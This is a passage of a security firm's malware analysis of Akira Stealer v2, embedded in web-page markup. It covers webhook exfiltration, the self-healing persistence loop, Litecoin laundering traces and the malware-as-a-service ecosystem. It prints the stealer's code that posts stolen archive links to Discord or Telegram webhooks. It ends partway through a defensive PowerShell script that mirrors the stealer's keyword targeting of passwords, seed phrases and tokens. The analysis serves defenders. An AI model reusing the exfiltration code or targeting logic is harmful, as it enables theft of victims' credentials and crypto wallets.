configuration:",[56,14548,14550],{"className":8482,"code":14549,"language":8484,"meta":65,"style":65},"# at class initialization\nself.default_webhook = \"%DISCORD_OR_TG_WEBHOOK_URL%\"\n",[63,14551,14552,14557],{"__ignoreMap":65},[102,14553,14554],{"class":104,"line":105},[102,14555,14556],{},"# at class initialization\n",[102,14558,14559],{"class":104,"line":111},[102,14560,14561],{},"self.default_webhook = \"%DISCORD_OR_TG_WEBHOOK_URL%\"\n",[1255,14563,14564,14571],{},[1258,14565,14566,1062,14568],{},[251,14567,5337],{},[63,14569,14570],{},"https://discord.com/api/webhooks/\u003CWEBHOOK_ID>/\u003CWEBHOOK_TOKEN>",[1258,14572,14573,1062,14576],{},[251,14574,14575],{},"Telegram",[63,14577,14578],{},"https://api.telegram.org/bot\u003CTELEGRAM_TOKEN>/sendMessage",[12,14580,14581,14584],{},[251,14582,14583],{},"2. Real-Time Delivery","\nImmediately after a successful file upload, the malware executes:",[56,14586,14588],{"className":8482,"code":14587,"language":8484,"meta":65,"style":65},"payload = {\n 'username': 'Akira 💊',\n 'embeds': [{\n 'title': '🗄️ Exfiltration Complete',\n 'fields': [\n {'name': '🗂️ Archive', 'value': f'[Download ZIP]({download_url})'}\n ]\n }]\n}\n# Transmit the archive URL entirely in the JSON body\nrequests.post(self.default_webhook, json=payload, timeout=8)\n",[63,14589,14590,14594,14599,14604,14609,14614,14619,14624,14629,14633,14638],{"__ignoreMap":65},[102,14591,14592],{"class":104,"line":105},[102,14593,14465],{},[102,14595,14596],{"class":104,"line":111},[102,14597,14598],{}," 'username': 'Akira 💊',\n",[102,14600,14601],{"class":104,"line":329},[102,14602,14603],{}," 'embeds': [{\n",[102,14605,14606],{"class":104,"line":346},[102,14607,14608],{}," 'title': '🗄️ Exfiltration Complete',\n",[102,14610,14611],{"class":104,"line":650},[102,14612,14613],{}," 'fields': [\n",[102,14615,14616],{"class":104,"line":656},[102,14617,14618],{}," {'name': '🗂️ Archive', 'value': f'[Download ZIP]({download_url})'}\n",[102,14620,14621],{"class":104,"line":662},[102,14622,14623],{}," ]\n",[102,14625,14626],{"class":104,"line":668},[102,14627,14628],{}," }]\n",[102,14630,14631],{"class":104,"line":674},[102,14632,6410],{},[102,14634,14635],{"class":104,"line":680},[102,14636,14637],{},"# Transmit the archive URL entirely in the JSON body\n",[102,14639,14640],{"class":104,"line":9019},[102,14641,14642],{},"requests.post(self.default_webhook, json=payload, timeout=8)\n",[1255,14644,14645,14653],{},[1258,14646,6600,14647,14649,14650,1014],{},[63,14648,14501],{}," variable is interpolated into the embed’s ",[63,14651,14652],{},"fields.value",[1258,14654,14655,14656,14658,14659,6214],{},"For Telegram fallback, the ",[63,14657,14501],{}," appears in the plain-text ",[63,14660,2232],{},[12,14662,14663],{},[251,14664,14665],{},"3. EDR & Forensic Visibility Limitations",[1255,14667,14668,14677],{},[1258,14669,14670,14673,14674,14676],{},[251,14671,14672],{},"No Local Logging",": The malware does not write the ",[63,14675,14501],{}," to disk or system logs.",[1258,14678,14679,14682],{},[251,14680,14681],{},"EDR Blind Spots",": Tools like Microsoft Defender for Endpoint may flag the HTTP request attempt but cannot extract the embedded URL.",[12,14684,14685],{},[251,14686,14687],{},"4. Why the Analyst Cannot Recover This Locally:",[1255,14689,14690,14703,14722],{},[1258,14691,14692,14695,14696,14698,14699,14702],{},[251,14693,14694],{},"No Local Copy of Link",": The malware writes the ",[63,14697,14501],{}," only in memory and transmits it over the network; it does ",[4328,14700,14701],{},"not"," save this URL to disk or logs.",[1258,14704,14705,14708,14709,14711,1298,14716,14718,14719,1014],{},[251,14706,14707],{},"Ephemeral Staging Cleanup",": Immediately after upload, the code executes:",[531,14710],{},[102,14712,14715],{"className":14713},[14714],"text-monospace","shutil.rmtree(ROOT)",[531,14717],{},"\nerasing all staged artifacts (including any transient text files) from ",[63,14720,14721],{},"%TEMP%",[1258,14723,14724,14727,14728,14731],{},[251,14725,14726],{},"Network-Only Transmission",": Webhook calls (",[63,14729,14730],{},"requests.post",") occur in-memory; no HTTP logs or browser history entries are created on the victim machine.",[2109,14733,14734],{},[12,14735,14736,14739,14740,14742,14743,14745],{},[251,14737,14738],{},"Implication for Analysts:","\nWithout live packet capture (e.g., network TAP or proxy) at the time of execution, the exact ",[63,14741,14501],{}," is unrecoverable post-infection.\nAdditionally, the exfiltrated archive is auto-deleted from the hosting service, further reducing the window for forensic retrieval.\nPost-infection imaging or host-based forensic recovery will ",[4328,14744,14701],{}," reveal the attacker’s URL or file host credentials, as no artifacts remain locally.",[52,14747],{"className":14748},[4854,4855],[41,14750,14752],{"id":14751},"_713-conclusion","7.13 Conclusion",[12,14754,47],{},[12,14756,14757,14759],{},[63,14758,4622],{}," (Akira Stealer v2) is a comprehensive, commercially distributed stealer toolkit. It combines extensive targeting, sophisticated anti-analysis, dynamic infrastructure control, and full-stack data theft across credentials, crypto, system profiling, and user files. Its modularity and stealth, combined with rapid reinfection methods, make it one of the most technically advanced stealers observed in active deployment.",[25,14761,14763],{"id":14762},"_8-circular-execution-chain-a-self-healing-loop","8. Circular Execution Chain: A Self-Healing Loop",[12,14765,31],{},[12,14767,14768,14769,14772],{},"One of the most technically sophisticated elements of this campaign is its regenerative, circular execution model. Unlike conventional malware with linear stages that flow from dropper to payload and then vanish, this operation was engineered like a ",[251,14770,14771],{},"closed loop"," — where every component watches over the others.",[12,14774,14775,14776,14779],{},"This ",[251,14777,14778],{},"self-healing architecture"," made the infection chain not only persistent, but also autonomous. It could fully recover from partial removals. As long as one piece remained alive, the entire malware ecosystem could reassemble itself.",[41,14781,14783],{"id":14782},"_81-behavioral-breakdown","8.1 Behavioral Breakdown",[12,14785,47],{},[6086,14787,14788,14814,14827,14858,14876],{},[1258,14789,14790,14795,14797,14798,14801,14802,14804,14805,14807,14808,14810,14811,14813],{},[251,14791,14792,14793,1289],{},"Persistence Anchor (",[63,14794,4614],{},[63,14796,4614],{}," acts as the foundational foothold. It is typically dropped into a Windows user startup location, such as ",[63,14799,14800],{},"%APPDATA%\\Microsoft\\Windows\\Start Menu\\Programs\\Startup",", or registered via ",[63,14803,5665],{},". Its job is simple but critical: ensure ",[63,14806,4618],{}," is present and launch it silently during user logon. If ",[63,14809,4618],{}," is missing, it re-extracts the archive ",[63,14812,5831],{}," (located in a temp folder or dropped anew), regenerating the full Electron app structure.",[1258,14815,14816,14821,14823,14824,14826],{},[251,14817,14818,14819,1289],{},"Bridge Loader (",[63,14820,4618],{},[63,14822,4618],{}," is the Electron-wrapped Node.js application. It doesn’t expose any GUI and operates entirely in the background. Upon execution, it runs the embedded JavaScript logic within ",[63,14825,5068],{},", using Node.js as a runtime environment. This abstraction layer decouples the core logic from the PE stub, helping to evade traditional analysis.",[1258,14828,14829,14834,14835,14837,14838],{},[251,14830,14831,14832,1289],{},"Execution Orchestrator (",[63,14833,6810],{},"\nEmbedded within ",[63,14836,5068],{},", this is the true controller of the infection chain. Its key functions include:",[1255,14839,14840,14846,14849],{},[1258,14841,14842,14843,14845],{},"Checking for the presence of ",[63,14844,4614],{}," and redeploying it if missing",[1258,14847,14848],{},"Dynamically injecting runtime configuration: webhook URLs, C2 addresses, tokens",[1258,14850,14851,14852,14854,14855,14857],{},"Either invoking the already-present Python payload (",[63,14853,4622],{},") or downloading it as part of a ZIP bundle (e.g., ",[63,14856,6874],{},") from attacker-controlled infrastructure",[1258,14859,14860,14865,14866,14868,14869,14871,14872,14875],{},[251,14861,14862,14863,1289],{},"Payload Execution (",[63,14864,4622],{},"\nOnce triggered, ",[63,14867,4622],{}," executes in memory via ",[63,14870,4593],{},". It systematically collects saved credentials, cookies, Discord tokens, browser session data, and cryptocurrency wallet extensions. The data is staged in a ZIP archive and exfiltrated via HTTPS — commonly to Discord webhooks, but fallback APIs like ",[63,14873,14874],{},"gofile.io"," or custom C2 endpoints have also been observed.",[1258,14877,14878,14881,14882,14884,14885,14887,14888,14890,14891,14893,14894,14896],{},[251,14879,14880],{},"Loop Integrity and Self-Healing","\nThe design is circular. If ",[63,14883,4614],{}," is deleted, it will be redeployed. If ",[63,14886,4618],{}," is missing, ",[63,14889,4614],{}," re-extracts it from ",[63,14892,5831],{},". If ",[63,14895,4622],{}," is deleted, it is re-obtained by the JavaScript layer. This interdependency makes the malware resilient and capable of reconstructing its execution chain from virtually any surviving fragment.",[12,14898,14899,14900,14903],{},"This architecture is not just modular — it’s ",[251,14901,14902],{},"self-sustaining",", deliberately engineered for stealth, flexibility, and long-term survivability in target environments.",[41,14905,14907],{"id":14906},"_82-why-this-is-noteworthy","8.2 Why This Is Noteworthy",[12,14909,47],{},[12,14911,14912,14913,1014],{},"The campaign’s architectural design reflects a level of sophistication not typically seen in commodity infostealers. It goes beyond simple multi-stage loaders — this is malware engineered for ",[251,14914,14915],{},"operational resilience, stealth, and automation",[12,14917,14918],{},[251,14919,14920],{},"Key Characteristics",[1255,14922,14923,14929,14966,14986],{},[1258,14924,14925,14928],{},[251,14926,14927],{},"Full Autonomy","\nOnce deployed, the malware requires no user interaction or external reactivation. It acts like a malicious microservice — orchestrating its own persistence, payload execution, and repair routines without external control.",[1258,14930,14931,14934,14935],{},[251,14932,14933],{},"Multi-Language Execution Stack","\nThe toolchain integrates:",[1255,14936,14937,14946,14952,14958],{},[1258,14938,14939,1403,14942,805,14944,1289],{},[251,14940,14941],{},"PE Binaries",[63,14943,4614],{},[63,14945,4618],{},[1258,14947,14948,14951],{},[251,14949,14950],{},"Node.js / JavaScript"," (via Electron)",[1258,14953,14954,14957],{},[251,14955,14956],{},"PowerShell"," (used for obfuscated payload relay)",[1258,14959,14960,1403,14963,14965],{},[251,14961,14962],{},"Python",[63,14964,4622],{},", executed as memory-resident stealer)\nThis layered composition makes it harder to profile, fingerprint, and analyze using conventional static tools.",[1258,14967,14968,14971,14972],{},[251,14969,14970],{},"Defense Evasion by Design","\nEvery component is encoded, encrypted, or dynamically injected:",[1255,14973,14974,14977,14980,14983],{},[1258,14975,14976],{},"Base64 PowerShell relay",[1258,14978,14979],{},"AES-encrypted and GZIP-compressed Python core",[1258,14981,14982],{},"Obfuscated JavaScript with runtime token injection",[1258,14984,14985],{},"Self-healing behavior that frustrates partial removal",[1258,14987,14988,14991,14992,14893,14995,14997,14998,15000],{},[251,14989,14990],{},"No Single Point of Failure","\nThe malware’s self-repair logic ensures that ",[251,14993,14994],{},"removal of a single component is insufficient",[63,14996,4614],{}," is removed, the info stealer recreates it. If ",[63,14999,4622],{}," is deleted, it is redownloaded and redeployed by the JavaScript controller.",[12,15002,15003,15004,15007],{},"In short, the malware behaves more like a ",[251,15005,15006],{},"distributed system"," than a typical payload — one that prioritizes survivability, modularity, and stealth.",[12,15009,15010,15011,15014],{},"This elevates the threat from an opportunistic attack to a ",[251,15012,15013],{},"resilient, adaptive platform"," — requiring defenders to match its complexity with equally layered detection and response strategies.",[41,15016,15018],{"id":15017},"_83-implications-for-blue-teams","8.3 Implications for Blue Teams",[12,15020,47],{},[12,15022,15023],{},"For defenders and CSOC operators, this kind of architecture raises the bar:",[1255,15025,15026,15032,15047],{},[1258,15027,15028,15031],{},[251,15029,15030],{},"Partial cleanup is ineffective",". All nodes must be identified and removed simultaneously.",[1258,15033,15034,15037,15038,15040,15041,15040,15043,15040,15045,1014],{},[251,15035,15036],{},"Defender for Endpoint correlation"," is essential. Analysts must trace full chains: from ",[63,15039,4614],{}," → ",[63,15042,5123],{},[63,15044,5218],{},[63,15046,4593],{},[1258,15048,15049,15052],{},[251,15050,15051],{},"IOC-free persistence"," means memory-based heuristics, telemetry baselining, and chain-based detection are key.",[12,15054,15055,15056,15059],{},"This isn’t just a stealer. It’s a ",[251,15057,15058],{},"resilient malware platform"," — behaving more like a distributed system than a simple threat. And that’s exactly what makes it both impressive and dangerous.",[25,15061,15063],{"id":15062},"_9-blockchain-tracking-and-analysis","9. Blockchain Tracking and Analysis",[12,15065,31],{},[41,15067,15069],{"id":15068},"_91-tracing-fund-distribution-in-a-litecoin-based-malware-campaign","9.1 Tracing Fund Distribution in a Litecoin-Based Malware Campaign",[12,15071,47],{},[12,15073,15074,15075,15078],{},"During the reverse engineering phase of this malware campaign, we extracted multiple hardcoded wallet addresses used by the stealer for cryptocurrency exfiltration. By following the on-chain activity of these Litecoin wallets, we were able to uncover patterns indicative of deliberate money laundering tactics. The attacker-controlled wallet ",[63,15076,15077],{},"LW6EopiZ..."," acts as a central aggregation point. Funds stolen from multiple victims are funneled into this address, after which they are rapidly redistributed across multiple new addresses.",[12,15080,15081],{},"The behavior seen here is representative of a classic split-transfer pattern used in crypto tumbling or mixing operations. In each instance, the full incoming balance is divided into two roughly proportional outbound transactions, each sent to a different wallet. This strategy is designed to hinder address clustering and chain tracing by obfuscating the provenance of funds. It’s an effective tactic to evade detection by automated blockchain analytics and threat intelligence platforms.",[12,15083,15084],{},"This laundering behavior leverages a combination of transaction timing, precise value splitting, and address reuse minimization to bypass heuristics commonly applied by clustering algorithms like those used in GraphSense, Chainalysis, or TRM Labs. The overall intent is to create high-entropy transactional flows, which confuse attribution and disrupt linkability, especially when the funds are eventually bridged across other assets or swapped into privacy-focused coins.",[12,15086,15087],{},"In the example below, we show a structured subset of this behavior. The incoming transactions represent distinct victim transfers. These values are then perfectly mapped to outbound flows, showing the coins being \"washed\" through fast, predictable, and algorithmically split payouts.",[417,15089,420,15092],{"className":15090,"style":8673},[15091],"font-size-1",[438,15093,15094,420,15117,420,15149,420,15177,420,15206],{},[426,15095,424,15096,424,15100,424,15104,424,15107,424,15111,424,15114,420],{},[430,15097,15099],{"style":15098},"text-align: left; width: 14%;","Input Source",[430,15101,15103],{"style":15102},"text-align: left; width: 12%;","Input Date",[430,15105,15106],{"style":15098},"Amount In (LTC)",[430,15108,15110],{"style":15109},"text-align: left; width: 20%;","→ Attacker Wallet",[430,15112,15113],{"style":10293},"Output Addresses",[430,15115,15116],{"style":8841},"Total Out (LTC)",[426,15118,424,15119,424,15122,424,15125,424,15128,424,15134,424,15147,420],{},[443,15120,15121],{},"Input_1",[443,15123,15124],{},"2024-09-21",[443,15126,15127],{},"0.25339198",[443,15129,428,15130,424],{},[102,15131,15133],{"title":15132},"LLQtaBnSAFpCFUw5cXRRka7Nvtrs4Up9bH","LLQtaBnSAF...",[443,15135,15136,15137,15140,15141,15136,15143,15146],{},"\n - ",[63,15138,15139],{},"LZmHkgkED..."," (0.15579078, 2024-09-26)",[531,15142],{},[63,15144,15145],{},"M8JpDsw5H7..."," (0.09760120, 2024-09-26)\n ",[443,15148,15127],{},[426,15150,424,15151,424,15154,424,15157,424,15160,424,15164,424,15175,420],{"style":8697},[443,15152,15153],{},"Input_2",[443,15155,15156],{},"2024-04-16",[443,15158,15159],{},"1.09976044",[443,15161,428,15162,424],{},[102,15163,15133],{"title":15132},[443,15165,15136,15166,15169,15170,15136,15172,15174],{},[63,15167,15168],{},"LgWrCAF8ED..."," (0.84304664, 2024-06-13)",[531,15171],{},[63,15173,15168],{}," (0.25671380, 2024-06-13)\n ",[443,15176,15159],{},[426,15178,424,15179,424,15182,424,15185,424,15188,424,15192,424,15204,420],{},[443,15180,15181],{},"Input_3",[443,15183,15184],{},"2024-03-06",[443,15186,15187],{},"0.77089346",[443,15189,428,15190,424],{},[102,15191,15133],{"title":15132},[443,15193,15136,15194,15197,15198,15136,15200,15203],{},[63,15195,15196],{},"LZL3wQcSRP..."," (0.38544673, 2024-03-04)",[531,15199],{},[63,15201,15202],{},"M8kiBpVHG3..."," (0.38544673, 2024-03-04)\n ",[443,15205,15187],{},[426,15207,424,15208,424,15211,424,15213,424,15215,424,15219,424,15229,420],{"style":8697},[443,15209,15210],{},"Input_4",[443,15212,15184],{},[443,15214,15187],{},[443,15216,428,15217,424],{},[102,15218,15133],{"title":15132},[443,15220,15136,15221,15197,15224,15136,15226,15203],{},[63,15222,15223],{},"LUFLTrqYpix...",[531,15225],{},[63,15227,15228],{},"La22dfH9eM...",[443,15230,15187],{},[52,15232],{"className":15233},[4854,4855],[25,15235,15237],{"id":15236},"_10-inside-the-akira-ecosystem-commercialized-cybercrime-infrastructure","10. Inside the Akira Ecosystem – Commercialized Cybercrime Infrastructure",[12,15239,31],{},[12,15241,15242],{},"Akira is not just a stealer—it’s the centerpiece of a thriving underground ecosystem designed to simplify, scale, and monetize cybercrime.",[41,15244,15246],{"id":15245},"_101-a-plug-and-play-ecosystem-for-threat-actors","10.1 A Plug-and-Play Ecosystem for Threat Actors",[12,15248,47],{},[12,15250,15251],{},"The Akira ecosystem exemplifies the evolution of cybercrime into a professionalized, service-driven economy. It includes:",[1255,15253,15254,15263,15269,15275,15281],{},[1258,15255,15256,15259,15260,1289],{},[251,15257,15258],{},"Builder Bots"," for on-demand payload generation (e.g., ",[63,15261,15262],{},"@AkiraRedBot",[1258,15264,15265,15268],{},[251,15266,15267],{},"Telegram channels"," for updates, feature requests, and customer support",[1258,15270,15271,15274],{},[251,15272,15273],{},"Automated licensing and payment handling",", often via direct messages or anonymous e-commerce platforms like Sellix",[1258,15276,15277,15280],{},[251,15278,15279],{},"Bundled modules"," such as clipboard hijackers, Discord token loggers, browser data stealers, and even ransomware add-ons",[1258,15282,15283,15286],{},[251,15284,15285],{},"Customizable payloads"," with configuration interfaces allowing toggles, webhook input, and icon branding",[12,15288,15289],{},[2772,15290],{"alt":15291,"src":15292},"Akira Stealer","https://res.cloudinary.com/c4a8/image/upload/v1749797420/blog/pics/akira-stealer-v2.jpg",[41,15294,15296],{"id":15295},"_102-commercialization-of-cybercrime","10.2 Commercialization of Cybercrime",[12,15298,47],{},[12,15300,15301],{},"Akira's structure reflects a broader movement toward \"Malware-as-a-Service\" (MaaS), where:",[1255,15303,15304,15310,15316,15322],{},[1258,15305,15306,15309],{},[251,15307,15308],{},"No deep technical skill"," is required to launch attacks",[1258,15311,15312,15315],{},[251,15313,15314],{},"Low entry costs"," ($75 for 3 months, $150 for lifetime)",[1258,15317,15318,15321],{},[251,15319,15320],{},"Instant support and documentation"," through Telegram",[1258,15323,15324,15327],{},[251,15325,15326],{},"Community contributions"," regularly extend Akira with scripts and feature suggestions",[12,15329,15330],{},"This ecosystem mirrors legitimate SaaS business models — with changelogs, UX improvements, pricing tiers, and upsells.",[12,15332,15333],{},[2772,15334],{"alt":15335,"src":15336},"Akria Stealer","https://res.cloudinary.com/c4a8/image/upload/v1749797061/blog/pics/akira-stealer.jpg",[41,15338,15340],{"id":15339},"_103-beyond-the-stealer-the-ecosystems-components","10.3 Beyond the Stealer – The Ecosystem's Components",[12,15342,47],{},[12,15344,5721,15345,15347],{},[63,15346,4622],{}," is the heart of many attacks, the ecosystem provides a full chain:",[1255,15349,15350,15353,15356,15359,15362],{},[1258,15351,15352],{},"Obfuscation tools like PyInstaller wrappers",[1258,15354,15355],{},"File binders for coupling malicious payloads with benign software",[1258,15357,15358],{},"Compilers, crypters, and runtime polymorphism",[1258,15360,15361],{},"Hosting mirrors for payload delivery and exfiltration (e.g., GoFile, AnonFiles)",[1258,15363,15364],{},"Data management bots that summarize stolen credentials and hardware profiles",[12,15366,15367],{},[2772,15368],{"alt":15369,"src":15370},"Akira Bot","https://res.cloudinary.com/c4a8/image/upload/v1749797107/blog/pics/akira-bot.jpg",[25,15372,15374],{"id":15373},"_11-akira-stealer-quickcheck-affected-files","11. Akira Stealer QuickCheck affected files",[12,15376,31],{},[41,15378,15380],{"id":15379},"_111-what-is-this-for","11.1 What Is This For?",[12,15382,47],{},[12,15384,15385,15386,805,15389,805,15392,6190,15395,15398],{},"After a suspected Akira Stealer infection, it's critical to know immediately which files on your system were at risk of exfiltration. The QuickCheck PowerShell script outlined above replicates Akira's exact search logic: it scans the user's ",[251,15387,15388],{},"Desktop",[251,15390,15391],{},"Documents",[251,15393,15394],{},"Downloads",[251,15396,15397],{},"OneDrive"," folders for files that:",[1255,15400,15401,15417,15420],{},[1258,15402,15403,15404,805,15407,805,15410,15413,15414],{},"Contain sensitive keywords in their filename, such as ",[63,15405,15406],{},"password",[63,15408,15409],{},"wallet",[63,15411,15412],{},"backup",", or ",[63,15415,15416],{},"token",[1258,15418,15419],{},"Have specific extensions commonly targeted (.txt, .docx, .pdf, .jpg, etc.)",[1258,15421,15422],{},"Are under the 2 MB size limit imposed by the malware",[12,15424,15425,15426,15429],{},"While QuickCheck offers a rapid overview based on Akira Stealer’s internal logic, ",[251,15427,15428],{},"it is not a substitute"," for comprehensive forensic tools or professional incident response. Always follow up with deeper analysis when dealing with confirmed breaches.",[12,15431,15432,15433,805,15436,805,15439,15442,15443,1014],{},"It then presents a sorted table of ",[251,15434,15435],{},"Filename",[251,15437,15438],{},"Relative Path",[251,15440,15441],{},"Size (KB)"," and the ",[251,15444,15445],{},"trigger keyword",[2109,15447,15448],{},[12,15449,15450,15453,15454,15457,15458,15460,15461,15464],{},[251,15451,15452],{},"DISCLAIMER","\nThis tool is provided ",[251,15455,15456],{},"“as is”"," without any warranty of completeness or fitness for a particular purpose. It does ",[251,15459,14701],{}," guarantee detection of ",[251,15462,15463],{},"all"," potentially sensitive files, nor does it replace full malware forensics. Use at your own risk.",[52,15466],{"className":15467},[4854],[41,15469,15471],{"id":15470},"legal-notice","Legal Notice",[12,15473,47],{},[12,15475,15476,15477,15480,15481,15484],{},"This QuickCheck Utility is intended for ",[251,15478,15479],{},"defensive security"," assessments only. Any unauthorized scanning or usage on systems you do not own may violate privacy, copyright, or computer misuse laws. glueckkanja AG assumes ",[251,15482,15483],{},"no liability"," for misuse or damages resulting from its use.",[41,15486,15488],{"id":15487},"powershell-script","PowerShell Script",[12,15490,47],{},[56,15492,15494],{"className":5687,"code":15493,"language":5689,"meta":65,"style":65},"\u003C#\n.SYNOPSIS\n QuickCheck: Lists all files that Akira Stealer would potentially exfiltrate.\n\n.DESCRIPTION\n Scans Desktop, Documents, Downloads and OneDrive for files that:\n • Contain one of the defined keywords in their name\n • Have an allowed file extension\n • Are not larger than 2 MB\n Presents the results in a colored, tabular overview.\n\n.NOTES\n © glueckkanja AG – Kaiserstr. 39 · 63065 Offenbach\n#>\n\n# -------------------------------------\n# 1. Configuration\n# -------------------------------------\n$scanFolders = @(\n \"$env:USERPROFILE\\Desktop\",\n \"$env:USERPROFILE\\Documents\",\n \"$env:USERPROFILE\\Downloads\",\n \"$env:USERPROFILE\\OneDrive\"\n)\n$keywords = 'passw','seed','mnemo','phrase','login','wallet','crypto','token','backup','secret','account'\n$extensions = '.txt','.doc','.docx','.pdf','.csv','.xls','.xlsx','.jpg','.png'\n$maxSize = 2MB\n\n# -------------------------------------\n# 2. Scan and Collect Matches\n# -------------------------------------\n$matches = [System.Collections.Generic.List[PSObject]]::new()\n\nforeach ($folder in $scanFolders) {\n if (-not (Test-Path $folder)) { continue }\n Get-ChildItem -Path $folder -Recurse -File -ErrorAction SilentlyContinue | ForEach-Object {\n # 2.1 Extension filter\n if ($extensions -notcontains $_.Extension.ToLower()) { return }\n # 2.2 Size filter\n if ($_.Length -gt $maxSize) { return }\n\n # 2.3 Keyword filter: explicit loop to avoid null-method calls\n $hit = $null\n foreach ($kw in $keywords) {\n if ($_.Name.ToLower().Contains($kw)) {\n $hit = $kw\n break\n }\n }\n if (-not $hit) { return }\n\n # 2.4 Build relative path\n $rel = $_.DirectoryName.Substring($env:USERPROFILE.Length + 1)\n\n # 2.5 Collect\n $matches.Add([PSCustomObject]@{\n FileName = $_.Name\n Location = $rel\n 'Size (KB)' = [math]::Round($_.Length / 1KB, 1)\n Keyword = $hit\n })\n }\n}\n\n# -------------------------------------\n# 3. Display Results\n# -------------------------------------\nclear\nWrite-Host \"🔍 glueckkanja AG – Akira Stealer QuickCheck\" -ForegroundColor Cyan\nWrite-Host \"────────────────────────────────────────────────────────\" -ForegroundColor DarkCyan\n\nif ($matches.Count -gt 0) {\n $matches |\n Sort-Object Location, FileName |\n Format-Table -AutoSize `\n @{Label='File'; Expression={$_.FileName}},\n @{Label='Location'; Expression={$_.Location}},\n @{Label='Size (KB)'; Expression={$_. 'Size (KB)'}},\n @{Label='Keyword'; Expression={$_.Keyword}}\n\n Write-Host \"`n⚠️ Total potential matches: $($matches.Count)\" -ForegroundColor Yellow\n}\nelse {\n Write-Host \"✅ No potentially compromised files found.\" -ForegroundColor Green\n}\n\nWrite-Host \"`n© glueckkanja AG · Kaiserstr. 39 · 63065 Offenbach\" -ForegroundColor DarkGray\nWrite-Host \"Disclaimer: This tool offers a high-level scan based on Akira Stealer’s logic; it does not replace full forensic analysis.\" -ForegroundColor DarkGray\n",[63,15495,15496,15501,15506,15511,15515,15520,15525,15530,15535,15540,15545,15549,15554,15559,15564,15568,15573,15578,15582,15587,15592,15597,15602,15607,15611,15616,15621,15626,15630,15634,15639,15643,15648,15652,15657,15662,15667,15672,15677,15682,15687,15691,15696,15701,15706,15711,15716,15721,15726,15731,15736,15740,15745,15750,15754,15759,15764,15769,15774,15779,15784,15789,15794,15798,15802,15806,15811,15815,15820,15825,15830,15834,15839,15844,15849,15854,15859,15864,15869,15875,15880,15886,15891,15897,15903,15908,15913,15919],{"__ignoreMap":65},[102,15497,15498],{"class":104,"line":105},[102,15499,15500],{},"\u003C#\n",[102,15502,15503],{"class":104,"line":111},[102,15504,15505],{},".SYNOPSIS\n",[102,15507,15508],{"class":104,"line":329},[102,15509,15510],{}," QuickCheck: Lists all files that Akira Stealer would potentially exfiltrate.\n",[102,15512,15513],{"class":104,"line":346},[102,15514,7846],{"emptyLinePlaceholder":2180},[102,15516,15517],{"class":104,"line":650},[102,15518,15519],{},".DESCRIPTION\n",[102,15521,15522],{"class":104,"line":656},[102,15523,15524],{}," Scans Desktop, Documents, Downloads and OneDrive for files that:\n",[102,15526,15527],{"class":104,"line":662},[102,15528,15529],{}," • Contain one of the defined keywords in their name\n",[102,15531,15532],{"class":104,"line":668},[102,15533,15534],{}," • Have an allowed file extension\n",[102,15536,15537],{"class":104,"line":674},[102,15538,15539],{}," • Are not larger than 2 MB\n",[102,15541,15542],{"class":104,"line":680},[102,15543,15544],{}," Presents the results in a colored, tabular overview.\n",[102,15546,15547],{"class":104,"line":9019},[102,15548,7846],{"emptyLinePlaceholder":2180},[102,15550,15551],{"class":104,"line":9025},[102,15552,15553],{},".NOTES\n",[102,15555,15556],{"class":104,"line":9031},[102,15557,15558],{}," © glueckkanja AG – Kaiserstr. 39 · 63065 Offenbach\n",[102,15560,15561],{"class":104,"line":9037},[102,15562,15563],{},"#>\n",[102,15565,15566],{"class":104,"line":9043},[102,15567,7846],{"emptyLinePlaceholder":2180},[102,15569,15570],{"class":104,"line":9049},[102,15571,15572],{},"# -------------------------------------\n",[102,15574,15575],{"class":104,"line":9055},[102,15576,15577],{},"# 1. Configuration\n",[102,15579,15580],{"class":104,"line":9061},[102,15581,15572],{},[102,15583,15584],{"class":104,"line":9067},[102,15585,15586],{},"$scanFolders = @(\n",[102,15588,15589],{"class":104,"line":9073},[102,15590,15591],{}," \"$env:USERPROFILE\\Desktop\",\n",[102,15593,15594],{"class":104,"line":9079},[102,15595,15596],{}," \"$env:USERPROFILE\\Documents\",\n",[102,15598,15599],{"class":104,"line":9085},[102,15600,15601],{}," \"$env:USERPROFILE\\Downloads\",\n",[102,15603,15604],{"class":104,"line":9091},[102,15605,15606],{}," \"$env:USERPROFILE\\OneDrive\"\n",[102,15608,15609],{"class":104,"line":9097},[102,15610,9238],{},[102,15612,15613],{"class":104,"line":9103},[102,15614,15615],{},"$keywords = 'passw','seed','mnemo','phrase','login','wallet','crypto','token','backup','secret','account'\n",[102,15617,15618],{"class":104,"line":9770},[102,15619,15620],{},"$extensions = '.txt','.doc','.docx','.pdf','.csv','.xls','.xlsx','.jpg','.png'\n",[102,15622,15623],{"class":104,"line":9775},[102,15624,15625],{},"$maxSize = 2MB\n",[102,15627,15628],{"class":104,"line":9780},[102,15629,7846],{"emptyLinePlaceholder":2180},[102,15631,15632],{"class":104,"line":9785},[102,15633,15572],{},[102,15635,15636],{"class":104,"line":9791},[102,15637,15638],{},"# 2. Scan and Collect Matches\n",[102,15640,15641],{"class":104,"line":9796},[102,15642,15572],{},[102,15644,15645],{"class":104,"line":9801},[102,15646,15647],{},"$matches = [System.Collections.Generic.List[PSObject]]::new()\n",[102,15649,15650],{"class":104,"line":9806},[102,15651,7846],{"emptyLinePlaceholder":2180},[102,15653,15654],{"class":104,"line":9811},[102,15655,15656],{},"foreach ($folder in $scanFolders) {\n",[102,15658,15659],{"class":104,"line":9816},[102,15660,15661],{}," if (-not (Test-Path $folder)) { continue }\n",[102,15663,15664],{"class":104,"line":9821},[102,15665,15666],{}," Get-ChildItem -Path $folder -Recurse -File -ErrorAction SilentlyContinue | ForEach-Object {\n",[102,15668,15669],{"class":104,"line":9827},[102,15670,15671],{}," # 2.1 Extension filter\n",[102,15673,15674],{"class":104,"line":9833},[102,15675,15676],{}," if ($extensions -notcontains $_.Extension.ToLower()) { return }\n",[102,15678,15679],{"class":104,"line":9839},[102,15680,15681],{}," # 2.2 Size filter\n",[102,15683,15684],{"class":104,"line":9844},[102,15685,15686],{}," if ($_.Length -gt $maxSize) { return }\n",[102,15688,15689],{"class":104,"line":9849},[102,15690,7846],{"emptyLinePlaceholder":2180},[102,15692,15693],{"class":104,"line":9854},[102,15694,15695],{}," # 2.3 Keyword filter: explicit loop to avoid null-method calls\n",[102,15697,15698],{"class":104,"line":9859},[102,15699,15700],{}," $hit = $null\n",[102,15702,15703],{"class":104,"line":9865},[102,15704,15705],{}," foreach ($kw in $keywords) {\n",[102,15707,15708],{"class":104,"line":9870},[102,15709,15710],{}," if ($_.Name.ToLower().Contains($kw)) {\n",[102,15712,15713],{"class":104,"line":9875},[102,15714,15715],{}," $hit = $kw\n",[102,15717,15718],{"class":104,"line":9880},[102,15719,15720],{}," 